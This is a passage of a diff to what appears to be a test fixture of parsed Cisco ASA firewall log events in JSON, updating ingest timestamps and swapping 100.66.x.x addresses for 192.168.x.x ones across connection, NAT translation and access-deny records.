"action": "firewall-rule", @@ -16526,8 +16526,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722191200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100433400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16573,8 +16573,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722196300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100437Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16620,8 +16620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722200700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100441600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16667,8 +16667,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722205100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100447Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16693,8 +16693,8 @@ }, "destination": { "port": 8308, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1304, @@ -16734,7 +16734,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -16742,8 +16742,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722209500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308", + "ingested": "2021-12-09T13:34:28.100452Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -16776,8 +16776,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -16812,7 +16812,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -16821,8 +16821,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722213800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", + "ingested": "2021-12-09T13:34:28.100457900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -16838,7 +16838,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11840", "source_interface": "outside", "mapped_destination_port": 1304 @@ -16876,8 +16876,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722218700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100462300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16923,8 +16923,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722223100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100466700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16954,8 +16954,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -16990,7 +16990,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -16999,8 +16999,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722227500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100471300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17016,7 +17016,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.0.124", + "mapped_source_ip": "192.168.0.124", "connection_id": "11841", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17038,8 +17038,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17074,7 +17074,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17083,8 +17083,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722231900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100477100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17100,7 +17100,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.160.2", + "mapped_source_ip": "192.168.160.2", "connection_id": "11842", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17122,8 +17122,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -17158,7 +17158,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -17168,8 +17168,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.722240800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", + "ingested": "2021-12-09T13:34:28.100483Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17206,8 +17206,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17242,7 +17242,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17252,8 +17252,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.722245400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:34:28.100488800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17285,8 +17285,8 @@ }, "destination": { "port": 8309, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1305, @@ -17326,7 +17326,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -17334,8 +17334,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722249800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309", + "ingested": "2021-12-09T13:34:28.100530100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -17368,8 +17368,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17404,7 +17404,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17413,8 +17413,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722254Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", + "ingested": "2021-12-09T13:34:28.100534300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -17430,7 +17430,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11843", "source_interface": "outside", "mapped_destination_port": 1305 @@ -17468,8 +17468,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722259900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100538600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17515,8 +17515,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722264500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100542200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17562,8 +17562,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722268800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100546100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17609,8 +17609,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722272800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100551Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17656,8 +17656,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722276900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100557200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17703,8 +17703,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722280800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100563200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17750,8 +17750,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722285100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100569100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17781,8 +17781,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17817,7 +17817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17828,8 +17828,8 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.722290Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.100574900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:52.000Z", @@ -17866,8 +17866,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17901,7 +17901,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17910,8 +17910,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722293900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100580800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -17947,8 +17947,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17982,7 +17982,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17991,8 +17991,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722297800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100586700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18028,8 +18028,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18063,7 +18063,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18072,8 +18072,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722301700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100592500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18104,8 +18104,8 @@ }, "destination": { "port": 8310, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1306, @@ -18145,7 +18145,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -18153,8 +18153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722305500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310", + "ingested": "2021-12-09T13:34:28.100598400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -18187,8 +18187,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18223,7 +18223,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18232,8 +18232,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722309300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", + "ingested": "2021-12-09T13:34:28.100604500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -18249,7 +18249,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11844", "source_interface": "outside", "mapped_destination_port": 1306 @@ -18271,8 +18271,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18306,7 +18306,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18315,8 +18315,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722313100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100610200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18352,8 +18352,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18387,7 +18387,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18396,8 +18396,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722316800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100616100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18433,8 +18433,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18468,7 +18468,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18477,8 +18477,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722320600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100622Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18514,8 +18514,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18549,7 +18549,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18558,8 +18558,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722324600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100627900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18595,8 +18595,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18630,7 +18630,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18639,8 +18639,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722328300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100633800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18676,8 +18676,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18711,7 +18711,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18720,8 +18720,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722332200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100639700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18757,8 +18757,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18792,7 +18792,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18801,8 +18801,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722336Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100644200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18838,8 +18838,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18873,7 +18873,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18882,8 +18882,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722340200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100647800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst 